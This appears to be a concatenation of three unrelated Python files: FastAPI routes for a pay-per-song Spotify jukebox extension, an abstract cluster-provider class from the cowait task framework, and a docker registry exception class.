@jukebox_ext.get("/api/v1/jukebox/jb/invoicep/{song_id}/{juke_id}/{pay_hash}")
async def api_get_jukebox_invoice_paid(
song_id: str = Query(None),
juke_id: str = Query(None),
pay_hash: str = Query(None),
retry: bool = Query(False),
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
await api_get_jukebox_invoice_check(pay_hash, juke_id)
jukebox_payment = await get_jukebox_payment(pay_hash)
if jukebox_payment.paid:
async with httpx.AsyncClient() as client:
r = await client.get(
"https://api.spotify.com/v1/me/player/currently-playing?market=ES",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
rDevice = await client.get(
"https://api.spotify.com/v1/me/player",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
isPlaying = False
if rDevice.status_code == 200:
isPlaying = rDevice.json()["is_playing"]
if r.status_code == 204 or isPlaying == False:
async with httpx.AsyncClient() as client:
uri = ["spotify:track:" + song_id]
r = await client.put(
"https://api.spotify.com/v1/me/player/play?device_id="
+ jukebox.sp_device.split("-")[1],
json={"uris": uri},
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if r.status_code == 204:
return jukebox_payment
elif r.status_code == 401 or r.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Invoice not paid",
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Failed to get auth",
)
else:
return api_get_jukebox_invoice_paid(
song_id, juke_id, pay_hash, retry=True
)
else:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Invoice not paid"
)
elif r.status_code == 200:
async with httpx.AsyncClient() as client:
r = await client.post(
"https://api.spotify.com/v1/me/player/queue?uri=spotify%3Atrack%3A"
+ song_id
+ "&device_id="
+ jukebox.sp_device.split("-")[1],
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if r.status_code == 204:
return jukebox_payment
elif r.status_code == 401 or r.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Invoice not paid",
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Failed to get auth",
)
else:
return await api_get_jukebox_invoice_paid(
song_id, juke_id, pay_hash
)
else:
raise HTTPException(
status_code=HTTPStatus.OK, detail="Invoice not paid"
)
elif r.status_code == 401 or r.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.OK, detail="Invoice not paid"
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Failed to get auth"
)
else:
return await api_get_jukebox_invoice_paid(
song_id, juke_id, pay_hash
)
raise HTTPException(status_code=HTTPStatus.OK, detail="Invoice not paid")
############################GET TRACKS
@jukebox_ext.get("/api/v1/jukebox/jb/currently/{juke_id}")
async def api_get_jukebox_currently(
retry: bool = Query(False), juke_id: str = Query(None)
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
async with httpx.AsyncClient() as client:
try:
r = await client.get(
"https://api.spotify.com/v1/me/player/currently-playing?market=ES",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if r.status_code == 204:
raise HTTPException(status_code=HTTPStatus.OK, detail="Nothing")
elif r.status_code == 200:
try:
response = r.json()
track = {
"id": response["item"]["id"],
"name": response["item"]["name"],
"album": response["item"]["album"]["name"],
"artist": response["item"]["artists"][0]["name"],
"image": response["item"]["album"]["images"][0]["url"],
}
return track
except:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Something went wrong"
)
elif r.status_code == 401:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="INvoice not paid"
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Failed to get auth"
)
else:
return await api_get_jukebox_currently(retry=True, juke_id=juke_id)
else:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Something went wrong"
)
except:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Something went wrong"
)
|
from __future__ import annotations
from abc import abstractmethod
from typing import Iterable
from cowait.tasks import TaskDefinition, RemoteTask
from cowait.utils import EventEmitter
from .const import ENV_TASK_CLUSTER, ENV_TASK_DEFINITION, ENV_GZIP_ENABLED, MAX_ENV_LENGTH
from .errors import ProviderError
from .utils import env_pack
class ClusterProvider(EventEmitter):
def __init__(self, type, args={}):
super().__init__()
self.type = type
self.args = args
@abstractmethod
def spawn(self, taskdef: TaskDefinition) -> RemoteTask:
""" Spawn a task in the cluster """
raise NotImplementedError()
@abstractmethod
def destroy(self, task_id: str) -> None:
""" Destroy a task """
raise NotImplementedError()
@abstractmethod
def destroy_all(self) -> None:
raise NotImplementedError()
@abstractmethod
def destroy_children(self, parent_id: str) -> None:
raise NotImplementedError()
@abstractmethod
def wait(self, task: RemoteTask) -> bool:
""" Wait for task to exit. Returns True on clean exit. """
raise NotImplementedError()
@abstractmethod
def logs(self, task_id: str) -> Iterable[str]:
""" Stream logs from task """
raise NotImplementedError()
@abstractmethod
def list_all(self) -> list:
raise NotImplementedError()
def serialize(self) -> dict:
""" Serialize ClusterProvider into a dict """
return {
'type': self.type,
**self.args,
}
def find_agent(self):
return None
|
# -*- coding: utf-8; -*-
from __future__ import unicode_literals
import json
# TODO: update with more specific exceptions
class RegistryException(Exception):
def __init__(self, response):
self.response = response
if hasattr(response, 'content'):
try:
data = json.loads(response.content)
self.message = data['error'] if 'error' in data else "An unknown exception was found."
except:
self.message = "Unable to contact registry at '{0}'. Status {1}.".format(response.request.url, response.status_code)
else:
self.message = "There was an issue with the request to the docker registry."
super(RegistryException, self).__init__(self.message)
def __str__(self):
return super(RegistryException, self).__str__()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.